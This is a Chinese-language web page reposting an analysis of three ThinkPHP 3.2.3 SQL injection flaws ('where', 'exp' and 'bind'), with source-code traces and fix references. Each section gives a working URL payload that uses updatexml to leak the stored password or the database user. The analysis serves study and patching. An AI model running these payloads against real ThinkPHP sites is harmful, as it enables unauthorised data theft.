亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

公告:魔扣目錄網(wǎng)為廣大站長提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.430618.com 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

前言

Thinkphp是目前主流的一款php語言框架,但在使用中,也是產(chǎn)生了很多的高危漏洞。本文小編將從Thinkphp3說起,說明一些tp3框架的漏洞產(chǎn)生原理。使廣大愛好者進(jìn)一步深刻的理解框架。

 

環(huán)境搭建

  • 下載源碼
ThinkPhp3漏洞原理分析總結(jié)

 

  • 編輯器使用了phpstrom
ThinkPhp3漏洞原理分析總結(jié)

 

  • 配置數(shù)據(jù)庫
ThinkPhp3漏洞原理分析總結(jié)

 

  • 添加測試數(shù)據(jù)
ThinkPhp3漏洞原理分析總結(jié)

 

Thinkphp3.2.3 where注入

  • payload
?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23
  • 斷點(diǎn)
ThinkPhp3漏洞原理分析總結(jié)

 

分析

  • 經(jīng)過htmlspecialchars過濾
ThinkPhp3漏洞原理分析總結(jié)

 

  • 于442行通過think_filter函數(shù)進(jìn)行過濾
ThinkPhp3漏洞原理分析總結(jié)

 

  • 經(jīng)過ThinkPHP/Library/Think/Model.class.php:779的find()方法
ThinkPhp3漏洞原理分析總結(jié)

 

  • 滿足條件則進(jìn)入
ThinkPhp3漏洞原理分析總結(jié)

 

  • 強(qiáng)制進(jìn)行轉(zhuǎn)換,轉(zhuǎn)換為了int形
ThinkPhp3漏洞原理分析總結(jié)

 

  • 帶入查詢
ThinkPhp3漏洞原理分析總結(jié)

 

  • 步驟
id=1' -> I() -> find() -> __parseoptions() ->_parseType()

滿足條件才能進(jìn)去__parseOptions()方法

  • 條件
if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))
  • 繞過
index.php?id[where]=3 and 1=1

修復(fù)

ThinkPhp3漏洞原理分析總結(jié)

 

Thinkphp 3.2.3 exp注入

  • 部署環(huán)境
ThinkPhp3漏洞原理分析總結(jié)

 

  • payload
http://localhost:8888/tp3/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)
ThinkPhp3漏洞原理分析總結(jié)

 

分析

  • 進(jìn)入Model.class.php的822行this−>select(this−>select(options)
ThinkPhp3漏洞原理分析總結(jié)

 

  • 跟進(jìn)select方法
ThinkPhp3漏洞原理分析總結(jié)

 

  • 跟蹤Driver.class.php中的parseSql方法
ThinkPhp3漏洞原理分析總結(jié)

 

  • 跟蹤Driver.class.php中的parseWhere方法
ThinkPhp3漏洞原理分析總結(jié)

 

  • 經(jīng)過whereStr.=whereStr.=this->parseWhereItem(this−>parseKey(this−>parseKey(key), $val)方法,跟蹤進(jìn)去
需要時(shí)數(shù)組才可以進(jìn)去if語句
ThinkPhp3漏洞原理分析總結(jié)

 

  • 語句exp直接拼接構(gòu)成注入
 } elseif ('bind' == $exp) {
                    // 使用表達(dá)式
 $whereStr .= $key . ' = :' . $val[1];

修復(fù)

使用I方法接受會(huì)通過think_filter函數(shù)進(jìn)行過濾

thinkphp 3.2.3 bind注入

  • payload
index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1
  • 環(huán)境部署
    public function index()
    {
        $User = M("Users");
        $user['id'] = I('id');
        $data['password'] = I('password');
        $valu = $User->where($user)->save($data);
        var_dump($valu);
    }

上文說到除了exp還有bind可以進(jìn)行注入

  • 報(bào)錯(cuò)
ThinkPhp3漏洞原理分析總結(jié)

 

  • 進(jìn)入update方法
ThinkPhp3漏洞原理分析總結(jié)

 

  • 進(jìn)入到了parseWhereItem方法(bind可以注入)
ThinkPhp3漏洞原理分析總結(jié)

 

  • 于函數(shù)bindParam進(jìn)行了添加冒號(hào)
ThinkPhp3漏洞原理分析總結(jié)

 

  • 在Driver.class.php文件execute中進(jìn)行冒號(hào)替換
if (!empty($this->bind)) {
            $that           = $this;
            $this->queryStr = strtr($this->queryStr, array_map(function ($val) use ($that) {return ''' . $that->escapeString($val) . ''';}, $this->bind));
}
  • 如果payload不是0的話
ThinkPhp3漏洞原理分析總結(jié)

 

修復(fù)

https://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4
ThinkPhp3漏洞原理分析總結(jié)

 

分享到:
標(biāo)簽:漏洞 ThinkPhp3
用戶無頭像

網(wǎng)友整理

注冊時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定